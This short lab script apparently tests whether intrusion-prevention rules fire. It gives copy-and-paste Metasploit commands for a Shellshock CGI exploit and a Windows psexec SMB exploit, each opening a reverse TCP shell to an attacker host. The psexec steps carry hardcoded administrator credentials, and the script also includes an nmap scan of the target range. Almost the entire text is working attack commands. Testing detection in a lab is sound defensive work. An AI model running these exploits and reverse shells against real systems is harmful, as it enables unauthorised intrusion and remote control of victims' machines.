A ) (Should trigger 31977 -- but doesn't)

On the Outside Linux Server:
1. Type "kali" to attach to the Kali Linux docker container.
2. Type "msfconsole" to start Metasploit.

Then do a port scan on addresses known to be used by the target network:
nmap 198.18.128.200/29

Then copy and paste the following commands:
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set LHOST 172.17.0.2
set LPORT 4444
set RHOST 198.18.128.202
set targeturi /cgi-bin/hello.sh
set payload linux/x86/shell/reverse_tcp
check
exploit





B) (Triggers 38321 -- currently disabled in Demo Instrusion Policy)

On the Inside Linux Server:
1. Type "kali" to attach to the Kali Linux docker container.
2. Type "msfconsole" to start Metasploit.

Then copy and paste the following commands:
use exploit/windows/smb/psexec
set RHOST 198.18.128.202
set PAYLOAD windows/shell/reverse_tcp
set LHOST 172.17.0.3
set LPORT 4444
set SMBUSER administrator
set SMPASS C1sco12345
exploit